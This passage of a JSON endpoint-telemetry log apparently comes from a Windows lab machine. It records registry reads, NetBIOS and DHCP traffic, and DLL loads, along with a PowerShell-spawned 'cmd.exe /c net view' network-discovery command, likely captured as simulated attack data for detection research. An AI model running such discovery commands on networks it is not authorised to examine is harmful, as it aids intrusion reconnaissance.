"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\LeaseObtainedTime", - "registry_value": "LeaseObtainedTime", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\T1", - "registry_value": "T1", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\T2", - "registry_value": "T2", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\LeaseTerminatesTime", - "registry_value": "LeaseTerminatesTime", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\AddressType", - "registry_value": "AddressType", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\IsServerNapAware", - "registry_value": "IsServerNapAware", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpConnForceBroadcastFlag", - "registry_value": "DhcpConnForceBroadcastFlag", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\NetBT", - "registry_value": "NetBT", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\NetBT", - "registry_value": "NetBT", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" - }, - { - "event_type": "registry", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" - }, - { - "event_type": "registry", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" - }, - { - "event_type": "registry", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" - }, - { - "event_type": "registry", - "pid": 1612, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884180000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_value": "Cache", - "timestamp": 131883571884330000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_value": "Intranet", - "timestamp": 131883571884330000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_value": "localdomain", - "timestamp": 131883571884330000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "event_type": "registry", - "pid": 1596, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", - "timestamp": 131883571884330000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" - }, - { - "destination_address": "192.168.162.129", - "destination_port": "139", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "tcp", - "source_address": "192.168.162.134", - "source_port": "50503", - "subtype": "outgoing", - "timestamp": 131883571877130000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.255", - "destination_port": "138", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "138", - "subtype": "outgoing", - "timestamp": 131883571877190000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.134", - "destination_port": "138", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.255", - "source_port": "138", - "subtype": "incoming", - "timestamp": 131883571877190000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.254", - "destination_port": "67", - "event_type": "network", - "pid": 1416, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "68", - "subtype": "outgoing", - "timestamp": 131883571884160000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}", - "user": "NT AUTHORITY\\LOCAL SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "LOCAL SERVICE" - }, - { - "destination_address": "192.168.162.254", - "destination_port": "137", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "137", - "subtype": "outgoing", - "timestamp": 131883571887450016, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.129", - "destination_port": "137", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.255", - "source_port": "137", - "subtype": "incoming", - "timestamp": 131883571922940000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.129", - "destination_port": "138", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.134", - "source_port": "138", - "subtype": "incoming", - "timestamp": 131883571922940000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "process", - "pid": 5628, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "terminate", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" - }, - { - "event_type": "process", - "pid": 5360, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"net view\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 8124, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571956180000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571956060016, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8124, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" - }, - { - "command_line": "net view", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1744, - "ppid": 8124, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "create", - "timestamp": 131883571956270016, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}", - "unique_ppid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "net.exe", - "image_path": "C:\\Windows\\System32\\net.exe", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\System32\\mpr.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 1744, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883571956210000, - "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" - }, - { - "event_type": "image_load", - "image_name": 